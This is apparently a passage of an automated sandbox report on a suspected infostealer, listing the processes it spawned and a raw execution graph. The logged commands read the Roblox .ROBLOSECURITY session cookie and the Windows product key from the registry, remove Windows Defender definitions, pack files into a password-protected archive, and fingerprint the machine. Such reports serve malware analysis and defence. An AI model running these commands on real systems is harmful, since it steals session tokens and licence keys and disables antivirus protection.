MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:04:44:11
Start date:15/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff7f6760000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:04:44:11
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:04:44:11
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff7f6760000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:04:44:12
Start date:15/11/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
Imagebase:0x7ff646230000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:getmac
                                                                                                                                                                                                                                          Imagebase:0x7ff6ed7b0000
                                                                                                                                                                                                                                          File size:90'112 bytes
                                                                                                                                                                                                                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
                                                                                                                                                                                                                                          Imagebase:0x7ff7915c0000
                                                                                                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:04:44:16
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:04:44:16
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:04:44:16
Start date:15/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:04:44:18
Start date:15/11/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:0x7ff61f730000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:04:44:24
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:04:44:24
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:04:44:24
Start date:15/11/2024
Path:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
Imagebase:0x7ff702c00000
File size:630'736 bytes
MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:69
Start time:04:44:26
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:04:44:26
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:04:44:26
Start date:15/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic os get Caption
Imagebase:0x7ff7374d0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:72
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:76
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:77
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:78
                                                                                                                                                                                                                                          Start time:04:44:29
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:79
                                                                                                                                                                                                                                          Start time:04:44:29
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

Target ID: 80
Start time: 04:44:29
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 81
Start time: 04:44:31
Start date: 15/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff602d80000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 82
Start time: 04:44:31
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 83
Start time: 04:44:31
Start date: 15/11/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7374d0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 84
Start time: 04:44:32
Start date: 15/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase: 0x7ff602d80000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 85
Start time: 04:44:32
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 04:44:32
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true


Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 23
7ff633d63eea 16014->16017 16021 7ff633d63e46 16014->16021 16020 7ff633d68940 40 API calls 16017->16020 16020->16047 16021->16047 16337 7ff633d66dc0 16021->16337 16047->16006 16047->16008 16322 7ff633d6c550 16057->16322 16059 7ff633d79b64 16058->16059 16060 7ff633d79b43 16058->16060 18649 7ff633d7a3d8 16059->18649 16060->15904 16063 7ff633d6d2b8 GetModuleHandleW 16064 7ff633d6d2c9 16063->16064 16064->15912 16066 7ff633d6cfa1 16065->16066 16067 7ff633d6cd60 16066->16067 16068 7ff633d6d888 7 API calls 16066->16068 16067->15902 16068->16067 16070 7ff633d6d152 __GetCurrentState memcpy_s 16069->16070 16071 7ff633d6d171 RtlCaptureContext RtlLookupFunctionEntry 16070->16071 16072 7ff633d6d19a RtlVirtualUnwind 16071->16072 16073 7ff633d6d1d6 memcpy_s 16071->16073 16072->16073 16074 7ff633d6d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16073->16074 16075 7ff633d6d256 __GetCurrentState 16074->16075 16075->15900 16077 7ff633d6d89a 16076->16077 16078 7ff633d6d890 16076->16078 16077->15918 16082 7ff633d6dc24 16078->16082 16083 7ff633d6dc33 16082->16083 16085 7ff633d6d895 16082->16085 16090 7ff633d6de60 16083->16090 16086 7ff633d6dc90 16085->16086 16087 7ff633d6dcbb 16086->16087 16088 7ff633d6dc9e DeleteCriticalSection 16087->16088 16089 7ff633d6dcbf 16087->16089 16088->16087 16089->16077 16094 7ff633d6dcc8 16090->16094 16095 7ff633d6ddb2 TlsFree 16094->16095 16101 7ff633d6dd0c __vcrt_FlsAlloc 16094->16101 16096 7ff633d6dd3a LoadLibraryExW 16098 7ff633d6dd5b GetLastError 16096->16098 16099 7ff633d6ddd9 16096->16099 16097 7ff633d6ddf9 GetProcAddress 16097->16095 16098->16101 16099->16097 16100 7ff633d6ddf0 FreeLibrary 16099->16100 16100->16097 16101->16095 16101->16096 16101->16097 16102 7ff633d6dd7d LoadLibraryExW 16101->16102 16102->16099 16102->16101 16104 7ff633d6d28b GetStartupInfoW 16103->16104 16104->15907 16106 7ff633d7f480 16105->16106 16108 7ff633d7f526 16106->16108 16109 7ff633d7f4d3 16106->16109 16434 7ff633d7f358 16108->16434 16424 
7ff633d7a814 16109->16424 16111 7ff633d7f4fc 16111->15927 16541 7ff633d6c850 16112->16541 16115 7ff633d636eb GetLastError 16548 7ff633d62c50 16115->16548 16116 7ff633d63710 16543 7ff633d69280 FindFirstFileExW 16116->16543 16119 7ff633d63706 16124 7ff633d6c550 _log10_special 8 API calls 16119->16124 16121 7ff633d6377d 16574 7ff633d69440 16121->16574 16122 7ff633d63723 16563 7ff633d69300 CreateFileW 16122->16563 16127 7ff633d637b5 16124->16127 16126 7ff633d6378b 16126->16119 16131 7ff633d62810 49 API calls 16126->16131 16127->16057 16134 7ff633d61950 16127->16134 16129 7ff633d6374c __vcrt_FlsAlloc 16129->16121 16130 7ff633d63734 16566 7ff633d62810 16130->16566 16131->16119 16135 7ff633d645c0 108 API calls 16134->16135 16137 7ff633d61985 16135->16137 16136 7ff633d61c43 16138 7ff633d6c550 _log10_special 8 API calls 16136->16138 16137->16136 16139 7ff633d67f90 83 API calls 16137->16139 16140 7ff633d61c5e 16138->16140 16141 7ff633d619cb 16139->16141 16140->15933 16140->15934 16183 7ff633d61a03 16141->16183 16979 7ff633d706d4 16141->16979 16143 7ff633d7004c 74 API calls 16143->16136 16144 7ff633d619e5 16145 7ff633d619e9 16144->16145 16146 7ff633d61a08 16144->16146 16147 7ff633d74f08 _get_daylight 11 API calls 16145->16147 16983 7ff633d7039c 16146->16983 16149 7ff633d619ee 16147->16149 16986 7ff633d62910 16149->16986 16152 7ff633d61a26 16154 7ff633d74f08 _get_daylight 11 API calls 16152->16154 16153 7ff633d61a45 16157 7ff633d61a7b 16153->16157 16158 7ff633d61a5c 16153->16158 16155 7ff633d61a2b 16154->16155 16156 7ff633d62910 54 API calls 16155->16156 16156->16183 16160 7ff633d61c80 49 API calls 16157->16160 16159 7ff633d74f08 _get_daylight 11 API calls 16158->16159 16161 7ff633d61a61 16159->16161 16162 7ff633d61a92 16160->16162 16163 7ff633d62910 54 API calls 16161->16163 16164 7ff633d61c80 49 API calls 16162->16164 16163->16183 16165 7ff633d61add 16164->16165 16166 7ff633d706d4 73 API calls 16165->16166 16167 7ff633d61b01 16166->16167 16168 7ff633d61b16 16167->16168 16169 
